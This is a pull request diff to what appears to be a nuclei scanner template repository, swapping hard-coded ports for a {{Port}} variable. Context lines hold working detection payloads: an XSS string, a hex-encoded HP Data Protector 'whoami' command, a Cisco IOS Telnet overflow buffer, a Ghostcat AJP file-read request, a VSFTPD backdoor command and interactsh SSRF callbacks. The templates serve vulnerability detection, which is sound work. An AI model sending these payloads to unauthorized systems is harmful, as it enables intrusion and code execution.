### PR TITLE
Fix hardcoded ports across templates

### DIFF
--- a/http/cves/2018/CVE-2018-8024.yaml
+++ b/http/cves/2018/CVE-2018-8024.yaml
@@ -29,7 +29,7 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}:4040/jobs/?\"'><script>alert(document.domain)</script>"
+      - "{{Host}}:{{Port}}/jobs/?\"'><script>alert(document.domain)</script>"
 
     matchers-condition: and
     matchers:

--- a/http/cves/2020/CVE-2020-25780.yaml
+++ b/http/cves/2020/CVE-2020-25780.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-25780
 
 info:
   name: Commvault CommCell - Local File Inclusion
-  author: pdteam
+  author: pdteam, NaN@korelogic
   severity: high
   description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.
   impact: |
@@ -32,7 +32,7 @@ info:
 http:
   - method: POST
     path:
-      - "http://{{Host}}:81/SearchSvc/CVSearchService.svc"
+      - "http://{{Host}}:{{Port}}/SearchSvc/CVSearchService.svc"
 
     body: |
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">

--- a/http/misconfiguration/iot-vdme-simulator.yaml
+++ b/http/misconfiguration/iot-vdme-simulator.yaml
@@ -20,7 +20,7 @@ http:
   - method: GET
     path:
       - '{{BaseURL}}'
-      - '{{BaseURL}}:9998'
+      - '{{Host}}:{{Port}}'
 
     stop-at-first-match: true
 

--- a/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml
+++ b/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml
@@ -2,7 +2,7 @@ id: openbmcs-ssrf
 
 info:
   name: OpenBMCS 2.4 - Server-Side Request Forgery /  Remote File Inclusion
-  author: dhiyaneshDK
+  author: dhiyaneshDK, NaN@korelogic
   severity: medium
   description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
   reference:
@@ -24,7 +24,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        ip={{interactsh-url}}:80&argu=/
+        ip={{interactsh-url}}:{{Port}}&argu=/
 
     matchers-condition: and
     matchers:

--- a/http/vulnerabilities/generic/request-based-interaction.yaml
+++ b/http/vulnerabilities/generic/request-based-interaction.yaml
@@ -2,7 +2,7 @@ id: request-based-interaction
 
 info:
   name: OOB Request Based Interaction
-  author: pdteam
+  author: pdteam, NaN@korelogic
   severity: info
   description: The remote server fetched a spoofed DNS Name from the request.
   reference:
@@ -38,7 +38,7 @@ http:
         Accept: */*
 
       - |+
-        GET {{interactsh-url}}:80/ HTTP/1.1
+        GET {{interactsh-url}}:{{Port}}/ HTTP/1.1
         Host: {{Hostname}}
         Cache-Control: no-transform
         Accept: */*

--- a/network/cves/2011/CVE-2011-2523.yaml
+++ b/network/cves/2011/CVE-2011-2523.yaml
@@ -2,7 +2,7 @@ id: CVE-2011-2523
 
 info:
   name: VSFTPD 2.3.4 - Backdoor Command Execution
-  author: pussycat0x
+  author: pussycat0x, NaN@korelogic
   severity: critical
   description: |
     VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
@@ -42,7 +42,7 @@ tcp:
         read: 100
 
   - host:
-      - "{{Host}}:6200"
+      - "{{Host}}:{{Port}}"
     inputs:
       - data: "{{cmd}}\n"
         read: 100

--- a/network/cves/2016/CVE-2016-2004.yaml
+++ b/network/cves/2016/CVE-2016-2004.yaml
@@ -2,7 +2,7 @@ id: CVE-2016-2004
 
 info:
   name: HP Data Protector - Arbitrary Command Execution
-  author: pussycat0x
+  author: pussycat0x, NaN@korelogic
   severity: critical
   description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
   impact: |
@@ -31,7 +31,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:5555"
+      - "{{Host}}:{{Port}}"
     inputs:
       - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
         type: hex

--- a/network/cves/2016/CVE-2016-3510.yaml
+++ b/network/cves/2016/CVE-2016-3510.yaml
@@ -2,7 +2,7 @@ id: CVE-2016-3510
 
 info:
   name: Oracle WebLogic Server Java Object Deserialization -  Remote Code Execution
-  author: iamnoooob,rootxharsh,pdresearch
+  author: iamnoooob,rootxharsh,pdresearch, NaN@korelogic
   severity: critical
   description: |
     Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
@@ -46,8 +46,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:7001"
-
+      - "{{Host}}:{{Port}}"
     read-size: 4
     matchers:
       - type: word

--- a/network/cves/2017/CVE-2017-3881.yaml
+++ b/network/cves/2017/CVE-2017-3881.yaml
@@ -2,7 +2,7 @@ id: CVE-2017-3881
 
 info:
   name: Cisco IOS 12.2(55)SE11 - Remote Code Execution
-  author: dwisiswant0
+  author: dwisiswant0, NaN@korelogic
   severity: critical
   description: |
     A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
@@ -34,7 +34,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:23"
+      - "{{Host}}:{{Port}}"
     inputs:
       - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
         read: 1024

--- a/network/cves/2018/CVE-2018-2893.yaml
+++ b/network/cves/2018/CVE-2018-2893.yaml
@@ -2,7 +2,7 @@ id: CVE-2018-2893
 
 info:
   name: Oracle WebLogic Server - Remote Code Execution
-  author: milo2012
+  author: milo2012, NaN@korelogic
   severity: critical
   description: |
     The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
@@ -60,7 +60,7 @@ tcp:
         read: 1024
     host:
       - "{{Hostname}}"
-      - "{{Host}}:7001"
+      - "{{Host}}:{{Port}}"
     matchers:
       - type: word
         part: raw

--- a/network/cves/2020/CVE-2020-11981.yaml
+++ b/network/cves/2020/CVE-2020-11981.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-11981
 
 info:
   name: Apache Airflow <=1.10.10 - Command Injection
-  author: pussycat0x
+  author: pussycat0x, NaN@korelogic
   severity: critical
   description: |
     An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
@@ -65,7 +65,7 @@ tcp:
         read: 1024
     host:
       - "{{Hostname}}"
-      - "{{Host}}:6379"
+      - "{{Host}}:{{Port}}"
 
     matchers-condition: and
     matchers:

--- a/network/cves/2020/CVE-2020-1938.yaml
+++ b/network/cves/2020/CVE-2020-1938.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-1938
 
 info:
   name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability
-  author: milo2012
+  author: milo2012, NaN@korelogic
   severity: critical
   description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
   impact: |
@@ -36,12 +36,10 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:8009"
-
+      - "{{Host}}:{{Port}}"
     inputs:
       - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"
     read-size: 1024
-
     matchers:
       - type: word
         words:

--- a/network/cves/2021/CVE-2021-44521.yaml
+++ b/network/cves/2021/CVE-2021-44521.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-44521
 
 info:
   name: Apache Cassandra Load UDF RCE
-  author: Y4er
+  author: Y4er, NaN@korelogic
   severity: critical
   description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
   impact: |
@@ -32,7 +32,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:9042"
+      - "{{Host}}:{{Port}}"
     inputs:
       - data: "050000000500000000"
         type: hex

--- a/network/cves/2022/CVE-2022-24706.yaml
+++ b/network/cves/2022/CVE-2022-24706.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-24706
 
 info:
   name: CouchDB Erlang Distribution - Remote Command Execution
-  author: Mzack9999,pussycat0x
+  author: Mzack9999,pussycat0x, NaN@korelogic
   severity: critical
   description: |
     In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
@@ -42,7 +42,7 @@ variables:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:9100"
+      - "{{Host}}:{{Port}}"
     inputs:
       # auth
       - data: "{{name_msg}}"


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- This fixes hard-coded ports in templates that ultimately were resulting in nuclei halting if the target host did not have a listener on that port.

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

